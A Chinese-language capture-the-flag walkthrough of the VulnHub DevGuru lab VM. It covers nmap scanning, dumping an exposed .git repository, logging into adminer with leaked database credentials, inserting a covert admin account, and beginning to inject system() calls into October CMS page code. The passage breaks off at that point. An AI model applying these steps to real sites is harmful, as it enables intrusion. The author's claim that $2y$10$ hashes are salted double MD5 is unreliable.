◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
VulnHub-DevGuru(1 渗透测试)
地址:https://www.vulnhub.com/entry/devguru-1,620/
发布日期:2020年12月7日
缺陷:中级(取决于经验)
目标:获得user.txt与root.txt并获得root权限运行:VMware Workstation 16.x Pro(默认为NAT网络模式,VMware比VirtualBox更好地工作)
描述:
DevGuru是一家虚构的web开发公司,雇用您进行pentest评估。您的任务是在他们的公司网站上查找漏洞并获取root。
OSCP类~基于现实生活
前言
本次靶场使用VMware Workstation 16.x Pro进行构建运行。将我的kali系统和靶机一样使用NAT网络模式。本次演练使用kali系统按照渗透测试的过程进行操作。 难度中等,操作没有什么坑点,感觉这次的靶场比较接近真实环境了,小伙伴们快一起来做吧。文章有不对的地方欢迎师傅指正?
一、信息搜集
1 靶机ip获取
netdiscover -r 10.1.1.0/24 -i eth0
得到ip地址:10.1.1.8
2 开放端口服务信息获取
? root@ch4nge ~/桌面 nmap -sC -sV -p- 10.1.1.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 19:33 CST Nmap scan report for 10.1.1.8 Host is up (0.0010s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA) | 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA) |_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-generator: DevGuru | http-git: | 10.1.1.8:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Last commit message: first commit | Remotes: | http://devguru.local:8585/frank/devguru-website.git |_ Project type: PHP application (guessed from .gitignore) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Corp - DevGuru 8585/tcp open unknown | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=0a0626b515f413d4; Path=/; HttpOnly | Set-Cookie: _csrf=rq0pISC30S5Yie0MZ9NeA5ShaJw6MTYxMzczNDQwNzY4MjA2Mzk3Nw; Path=/; Expires=Sat, 20 Feb 2021 11:33:27 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Fri, 19 Feb 2021 11:33:27 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title> Gitea: Git with a cup of tea </title> | <link rel="manifest" href="https://www.freebuf.com/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> | <meta name="description" content="Gitea (Git with a cup of tea) is a painless | HTTPOptions: | HTTP/1.0 404 Not Found | Content-Type: text/html; charset=UTF-8 | Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647 | Set-Cookie: i_like_gitea=50a772af4f62345e; Path=/; HttpOnly | Set-Cookie: _csrf=Pb-MDaO5tNxTYoV_sYeLDo1PiIs6MTYxMzczNDQwNzczMzgwNzY2Ng; Path=/; Expires=Sat, 20 Feb 2021 11:33:27 GMT; HttpOnly | X-Frame-Options: SAMEORIGIN | Date: Fri, 19 Feb 2021 11:33:27 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-"> | <head data-suburl=""> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Page Not Found - Gitea: Git with a cup of tea </title> | <link rel="manifest" href="https://www.freebuf.com/manifest.json" crossorigin="use-credentials"> | <meta name="theme-color" content="#6cc644"> | <meta name="author" content="Gitea - Git with a cup of tea" /> |_ <meta name="description" content="Gitea (Git with a c 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8585-TCP:V=7.91%I=7%D=2/19%Time=602FA208%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r Content-Type:\x20t SF:ext/plain;\x20charset=utf-8\r Connection:\x20close\r \r 400\x20Bad\x SF:20Request")%r(GetRequest,2A02,"HTTP/1\.0\x20200\x20OK\r Content-Type:\ SF:x20text/html;\x20charset=UTF-8\r Set-Cookie:\x20lang=en-US;\x20Path=/; SF:\x20Max-Age=2147483647\r Set-Cookie:\x20i_like_gitea=0a0626b515f413d4; SF:\x20Path=/;\x20HttpOnly\r Set-Cookie:\x20_csrf=rq0pISC30S5Yie0MZ9NeA5S SF:haJw6MTYxMzczNDQwNzY4MjA2Mzk3Nw;\x20Path=/;\x20Expires=Sat,\x2020\x20Fe SF:b\x202021\x2011:33:27\x20GMT;\x20HttpOnly\r X-Frame-Options:\x20SAMEOR SF:IGIN\r Date:\x20Fri,\x2019\x20Feb\x202021\x2011:33:27\x20GMT\r \r <! SF:DOCTYPE\x20html> <html\x20lang="en-US"\x20class="theme-"> <head\x SF:20data-suburl=""> <meta\x20charset="utf-8"> <meta\x20name="v SF:iewport"\x20content="width=device-width,\x20initial-scale=1"> <me SF:ta\x20http-equiv="x-ua-compatible"\x20content="ie=edge"> <title> SF:\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title> <link SF:\x20rel="manifest"\x20href="/manifest\.json"\x20crossorigin="use-c SF:redentials"> <meta\x20name="theme-color"\x20content="#6cc644">\ SF:n <meta\x20name="author"\x20content="Gitea\x20-\x20Git\x20with\x20a SF:\x20cup\x20of\x20tea"\x20/> <meta\x20name="description"\x20conten SF:t="Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pai SF:nless")%r(HTTPOptions,212A,"HTTP/1\.0\x20404\x20Not\x20Found\r Content SF:-Type:\x20text/html;\x20charset=UTF-8\r Set-Cookie:\x20lang=en-US;\x20 SF:Path=/;\x20Max-Age=2147483647\r Set-Cookie:\x20i_like_gitea=50a772af4f SF:62345e;\x20Path=/;\x20HttpOnly\r Set-Cookie:\x20_csrf=Pb-MDaO5tNxTYoV_ SF:sYeLDo1PiIs6MTYxMzczNDQwNzczMzgwNzY2Ng;\x20Path=/;\x20Expires=Sat,\x202 SF:0\x20Feb\x202021\x2011:33:27\x20GMT;\x20HttpOnly\r X-Frame-Options:\x2 SF:0SAMEORIGIN\r Date:\x20Fri,\x2019\x20Feb\x202021\x2011:33:27\x20GMT\r\ SF:n\r <!DOCTYPE\x20html> <html\x20lang="en-US"\x20class="theme-"> SF:<head\x20data-suburl=""> <meta\x20charset="utf-8"> <meta\x20n SF:ame="viewport"\x20content="width=device-width,\x20initial-scale=1"> SF: <meta\x20http-equiv="x-ua-compatible"\x20content="ie=edge"> SF:<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x20a\x20c SF:up\x20of\x20tea\x20</title> <link\x20rel="manifest"\x20href="/man SF:ifest\.json"\x20crossorigin="use-credentials"> <meta\x20name="th SF:eme-color"\x20content="#6cc644"> <meta\x20name="author"\x20cont SF:ent="Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea"\x20/> <me SF:ta\x20name="description"\x20content="Gitea\x20\(Git\x20with\x20a\x20 SF:c"); MAC Address: 00:0C:29:AE:C0:9E (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.73 seconds
得到信息:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8585/tcp open unknown
注意这里的80端口服务中扫描到.Git信息,可以利用.git信息泄露漏洞获取源码
8585端口安装有gitea web应用
3 .git泄露
使用githack获取源码,githack脚本:https://github.com/lijiejie/GitHack
使用方法
python GitHack.py http://10.1.1.8/.git/
4. 信息搜集
在10.1.1.8/config/database.php发现数据库密码信息
发现10.1.1.8/adminer.php文件是数据库配置功能页面,类似phpmyadmin
二、漏洞探测
1. 登录adminer
URL:http://10.1.1.8/adminer.php
使用收集到的数据库用户名密码登录
服务器:localhost
用户名:october
密码:SQ66EBYx4GT3byXH
数据库:octoberdb
查看用户表backend_users
得到一个用户信息,登录用户名为:frank
既然有登录用户,那就找登录页面。
使用dirb扫描目录
dirb http://10.1.1.8/
2. 得到登录页面
http://10.1.1.8/backend
但是我没有密码!
3. 获取密码
途径有两个,一是修改frank密码字段为已知的密码加密字段,二是添加一个用户。这里使用后者,不会引起frank用户怀疑
选择新建数据
按照已知的用户数据格式进行填写字段,密码的加密格式需要一样~百度一下$2y$10$,得知是md5二次加密并加盐后的密码,使用在线加密网站进行加密123456即可(https://bcrypt-generator.com/)
填写字段参考frank用户的,点击编辑会看到设置页面。这里主要注意password和persist_code两个字段,值都是上面123456加密加盐值,类型不选。保存即可
4. 登录
用户名:linda
密码:123456
5. 漏洞探测
在CMS模块发现可以添加代码并调用,这里可疑直接把目标放在主页,进行添加命令执行函数
三、漏洞利用
1. 命令执行漏洞
在code中添加
function onStart()
{
$this->page["PoisonVar"]=system